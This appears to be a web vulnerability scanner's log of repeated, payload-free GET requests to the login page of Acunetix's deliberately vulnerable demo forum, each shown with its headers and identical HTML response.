<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p 